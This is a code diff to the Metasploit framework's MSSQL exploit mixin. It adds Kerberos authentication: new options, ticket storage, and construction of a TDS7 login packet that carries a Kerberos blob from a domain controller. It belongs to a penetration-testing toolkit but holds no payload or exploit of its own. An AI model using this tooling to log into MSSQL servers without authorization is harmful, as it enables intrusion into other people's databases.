@@ -16,6 +16,8 @@ module Exploit::Remote::MSSQL
   include Exploit::Remote::Tcp
   include Exploit::Remote::NTLM::Client
   include Metasploit::Framework::MSSQL::Base
+  include Msf::Exploit::Remote::Kerberos::Ticket::Storage
+  include Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Options
 
   #
   # Creates an instance of a MSSQL exploit module.
@@ -38,7 +40,9 @@ module Exploit::Remote::MSSQL
         OptPath.new('HEX2BINARY',   [ false, "The path to the hex2binary script on the disk",
           File.join(Msf::Config.data_directory, "exploits", "mssql", "h2b")
         ]),
-        OptString.new('DOMAIN', [ true, 'The domain to use for windows authentication', 'WORKSTATION'])
+        OptString.new('DOMAIN', [ true, 'The domain to use for windows authentication', 'WORKSTATION'], aliases: ['MssqlDomain']),
+        *kerberos_storage_options(protocol: 'Mssql'),
+        *kerberos_auth_options(protocol: 'Mssql', auth_methods: Msf::Exploit::Remote::AuthOption::MSSQL_OPTIONS),
       ], Msf::Exploit::Remote::MSSQL)
     register_autofilter_ports([ 1433, 1434, 1435, 14330, 2533, 9152, 2638 ])
     register_autofilter_services(%W{ ms-sql-s ms-sql2000 sybase })
@@ -308,8 +312,120 @@ module Exploit::Remote::MSSQL
       return false
     end
 
-    if datastore['USE_WINDOWS_AUTHENT']
+    if datastore['Mssql::Auth'] == Msf::Exploit::Remote::AuthOption::KERBEROS
+      idx = 0
+      pkt = ''
+      pkt_hdr = ''
+      pkt_hdr =  [
+        TYPE_TDS7_LOGIN, #type
+        STATUS_END_OF_MESSAGE, #status
+        0x0000, #length
+        0x0000, # SPID
+        0x01,   # PacketID (unused upon specification
+        # but ms network monitor stil prefer 1 to decode correctly, wireshark don't care)
+        0x00   #Window
+      ]
 
+      pkt << [
+        0x00000000,   # Size
+        0x71000001,   # TDS Version
+        0x00000000,   # Dummy Size
+        0x00000007,   # Version
+        rand(1024+1), # PID
+        0x00000000,   # ConnectionID
+        0xe0,         # Option Flags 1
+        0x83,         # Option Flags 2
+        0x00,         # SQL Type Flags
+        0x00,         # Reserved Flags
+        0x00000000,   # Time Zone
+        0x00000000    # Collation
+      ].pack('VVVVVVCCCCVV')
+
+      cname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) )
+      aname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) ) #application and library name
+      sname = Rex::Text.to_unicode( rhost )
+
+      fail_with(Msf::Exploit::Failure::BadConfig, 'The Mssql::Rhostname option is required when using Kerberos authentication.') if datastore['Mssql::Rhostname'].blank?
+      fail_with(Msf::Exploit::Failure::BadConfig, 'The DOMAIN option is required when using Kerberos authentication.') if datastore['DOMAIN'].blank?
+      fail_with(Msf::Exploit::Failure::BadConfig, 'The DomainControllerRhost is required when using Kerberos authentication.') if datastore['DomainControllerRhost'].blank?
+      offered_etypes = Msf::Exploit::Remote::AuthOption.as_default_offered_etypes(datastore['MssqlKrbOfferedEncryptionTypes'])
+      fail_with(Msf::Exploit::Failure::BadConfig, 'At least one encryption type is required when using Kerberos authentication.') if offered_etypes.empty?
+
+      kerberos_authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::MSSQL.new(
+        host: datastore['DomainControllerRhost'],
+        hostname: datastore['Mssql::Rhostname'],
+        proxies: datastore['Proxies'],
+        mssql_port: rport,
+        realm: datastore['MssqlDomain'],
+        username: datastore['username'],
+        password: datastore['password'],
+        framework: framework,
+        framework_module: self,
+        cache_file: datastore['Mssql::Krb5Ccname'].blank? ? nil : datastore['Mssql::Krb5Ccname'],
+        ticket_storage: kerberos_ticket_storage,
+        offered_etypes: offered_etypes
+      )
+
+      kerberos_result = kerberos_authenticator.authenticate
+      ssp_security_blob = kerberos_result[:security_blob]
+
+      idx = pkt.size + 50 # lengths below
+
+      pkt << [idx, cname.length / 2].pack('vv')
+      idx += cname.length
+
+      pkt << [0, 0].pack('vv') # User length offset must be 0
+      pkt << [0, 0].pack('vv') # Password length offset must be 0
+
+      pkt << [idx, aname.length / 2].pack('vv')
+      idx += aname.length
+
+      pkt << [idx, sname.length / 2].pack('vv')
+      idx += sname.length
+
+      pkt << [0, 0].pack('vv') # unused
+
+      pkt << [idx, aname.length / 2].pack('vv')
+      idx += aname.length
+
+      pkt << [idx, 0].pack('vv') # locales
+
+      pkt << [idx, 0].pack('vv') #db
+
+      # ClientID (should be mac address)
+      pkt << Rex::Text.rand_text(6)
+
+      # SSP
+      pkt << [idx, ssp_security_blob.length].pack('vv')
+      idx += ssp_security_blob.length
+
+      pkt << [idx, 0].pack('vv') # AtchDBFile
+
+      pkt << cname
+      pkt << aname
+      pkt << sname
+      pkt << aname
+      pkt << ssp_security_blob
+
+      # Total packet length
+      pkt[0, 4] = [pkt.length].pack('V')
+
+      pkt_hdr[2] = pkt.length + 8
+
+      pkt = pkt_hdr.pack("CCnnCC") + pkt
+
+      # Rem : One have to set check_status to false here because sql server sp0 (and maybe above)
+      # has a strange behavior that differs from the specifications
+      # upon receiving the ntlm_negociate request it send an ntlm_challenge but the status flag of the tds packet header
+      # is set to STATUS_NORMAL and not STATUS_END_OF_MESSAGE, then internally it waits for the ntlm_authentification
+      resp = mssql_send_recv(pkt, 15, false)
+
+      info = {:errors => []}
+      info = mssql_parse_reply(resp, info)
+
+      return false if not info
+      return info[:login_ack] ? true : false
+    elsif datastore['Mssql::Auth'] == Msf::Exploit::Remote::AuthOption::NTLM || datastore['USE_WINDOWS_AUTHENT']
       idx = 0
       pkt = ''
       pkt_hdr = ''
